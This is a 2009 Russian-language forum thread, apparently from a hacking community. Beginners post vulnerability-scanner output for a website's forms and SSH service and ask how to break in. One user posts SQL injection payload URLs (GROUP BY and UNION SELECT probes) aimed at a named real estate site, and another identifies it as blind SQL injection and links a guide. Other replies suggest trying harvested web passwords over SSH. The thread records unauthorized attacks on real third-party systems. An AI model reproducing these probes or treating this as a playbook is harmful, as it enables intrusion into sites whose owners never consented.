06.11.2009, 16:17
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от jecka3000
и все же мой вопрос остается в силе))
Какой же ты упрямый, вот скажи мне, что тебе даст если тебе скажут КАК? Сразу же отвечу, да ничего, не мозгов не прибавится, не знаний, так как принцип ты так и не поймёшь, неужели самому не интересно докапаться до сути?! Если нет, то и раздел засорять не стоит 
|
|
|
06.11.2009, 19:09
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 8
С нами:
8937720
Репутация:
5
|
|
Приветствую всех!
Нужна помощь! 
Код:
Доступна информация
Версии протоколов
Описание
Версии поддерживаемых протоколов :
1.99
2.0
***********************************
Доступна информация
Список форм
Описание
Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.
Список форм:
POST /melody/search.php HTTP/1.1
search=
POST /market/list.php HTTP/1.1
good_t=&t=&rid=&location=&price=&cat_id=¤cy=
POST /symb_cert/ HTTP/1.1
skey=&imei=&result=
POST /themegen/ HTTP/1.1
c_opos=&c_m.s.key=&c_name_menu=&c_clock_num=&c_gird_menu_color=&c_gird_menu_hl_color=&c_list_menu_color=&c_list_menu_hl_color=&c_tooday=&i_wallpaper=
POST /themegen/ajax/upload.php?p=s40.240x320 HTTP/1.1
myfile=
POST /books/ HTTP/1.1
name=&file=&otvet=
POST /feedback.php HTTP/1.1
name=&email=&Go=
POST /catalog/add_comment.php?id=3240 HTTP/1.1
skey=&name=&otvet=&go=&functions=&reliability=&design=&price_quality=&vote=
POST /accessories/result.php HTTP/1.1
search=&cat=&display=&led=&voicedial=&panels=&a2dp=&avrcp=&dsp=&length=
POST /wav/w_search.php HTTP/1.1
search=
POST /opinion/new.php HTTP/1.1
name=&subj=&model=&vote=
****************************************
За что тут можно зацепиться?
|
|
|
|
06.11.2009, 19:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
ни за что, ты просто выцепил все post-формы (наверное все, все что сканер нашел)
PS: Заманали икспайдерами, честное слово.
|
|
|
|
06.11.2009, 19:14
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 8
С нами:
8937720
Репутация:
5
|
|
А про 22 порт
SSH-2.0-OpenSSH_4.5p1 FreeBSD-20061110
???
Версии поддерживаемых протоколов :
1.99
2.0
Это ничего мне не даст? |
|
|
|
06.11.2009, 19:16
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 8
С нами:
8937720
Репутация:
5
|
|
Прошу прощения, уже сам нашел ответ
Качай putty http://www.tartarus.org/~simon/putty-snapshots/x86/putty.exe
И пробуй присоединиться к серваку используюя тот логин и пароль =)
А версия ssh тебе ничего не даст у меня там вообще Solaris v 0.1 beta написано =)
P.s
Думаю тебе это ничего не даст так как хостеры чаще всего не предоставляют ssh доступ =)
+ у какого идиота пароли от веба к паролям от sshd подходят o_0 ???
|
|
|
|
06.11.2009, 19:18
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 8
С нами:
8937720
Репутация:
5
|
|
PS: Заманали икспайдерами, честное слово.
Pashkela, я только учусь, не суди строго)
|
|
|
|
06.11.2009, 19:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
AntiHacker7:
https://forum.antichat.ru/thread153877.html
|
|
|
|
07.11.2009, 19:56
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Group by дает 6 полей,но подобрать не удается.Кто нибудь может обьяснить в чем причина.
Заранее всем спасибо.
http://www.realtor.am/newbuilding.php?id=10'+group+by+6%23&lang=en
http://www.realtor.am/newbuilding.php?id=10'+union+select+1,2,3,4,5,6%23 &lang=en
The used SELECT statements have a different number of columns
|
|
|
|
07.11.2009, 22:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от FlaktW
Group by дает 6 полей,но подобрать не удается.Кто нибудь может обьяснить в чем причина.
Заранее всем спасибо.
http://www.realtor.am/newbuilding.php?id=10'+group+by+6%23&lang=en
http://www.realtor.am/newbuilding.php?id=10'+union+select+1,2,3,4,5,6%23 &lang=en
The used SELECT statements have a different number of columns
Проще говоря у тебя Blind sql-inj (слепая скуля)
то есть sql-inj есть но без вывода
https://forum.antichat.ru/thread104591.html
Почитай эту тему для работы с ней
|
|
|
|
06.11.2009, 19:21
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 8
С нами:
8937720
Репутация:
5
|
|
AntiHacker7:
https://forum.antichat.ru/thread153877.html
Конечно спасибо, но это уже читал, сейчвс изучаю данную тему:
https://forum.antichat.ru/thread104591.html
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
